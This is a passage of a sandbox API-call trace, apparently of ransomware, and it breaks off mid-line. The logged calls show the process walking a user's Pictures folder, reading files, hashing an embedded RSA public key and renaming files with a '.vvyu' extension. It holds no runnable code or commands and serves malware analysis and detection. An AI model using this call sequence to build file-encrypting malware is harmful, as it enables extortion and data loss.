RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.600] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.600] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.600] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.600] CloseHandle (hObject=0x584) returned 1 [0187.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0187.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0187.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0187.602] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\V89DayYK-6YpvEr4NY.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\v89dayyk-6ypver4ny.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\V89DayYK-6YpvEr4NY.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\v89dayyk-6ypver4ny.gif.vvyu")) returned 1 [0187.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.604] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0187.608] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b98a340, ftCreationTime.dwHighDateTime=0x1d8a072, ftLastAccessTime.dwLowDateTime=0x2fb77630, ftLastAccessTime.dwHighDateTime=0x1d8a6ba, ftLastWriteTime.dwLowDateTime=0x2fb77630, ftLastWriteTime.dwHighDateTime=0x1d8a6ba, nFileSizeHigh=0x0, nFileSizeLow=0xb2ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WZMKMOpOZYAgO-UJTDf.bmp", cAlternateFileName="WZMKMO~1.BMP")) returned 1 [0187.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d48 [0187.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0187.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d48 | out: hHeap=0x6a0000) returned 1 [0187.608] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\WZMKMOpOZYAgO-UJTDf.bmp") returned=".bmp" [0187.608] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\WZMKMOpOZYAgO-UJTDf.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\wzmkmopozyago-ujtdf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.609] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=45804) returned 1 [0187.609] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.612] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb2c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.612] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.615] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.615] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xb2ec, lpOverlapped=0x0) returned 1 [0187.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.616] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.617] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.617] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.617] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.618] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.618] GetLastError () returned 0x0 [0187.618] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.618] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.618] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.618] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.618] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb2f0) returned 0x2d43778 [0187.619] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d48 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0187.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.620] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0187.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0187.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397c0 [0187.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d397a8 [0187.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0187.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0187.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.622] GetCurrentThreadId () returned 0x264 [0187.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37eb8 [0187.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.623] GetCurrentThreadId () returned 0x264 [0187.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0187.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397c0 [0187.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39820 [0187.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0187.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0187.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0187.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39838 [0187.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397d8 [0187.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397a8 [0187.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.633] HeapFree (in: 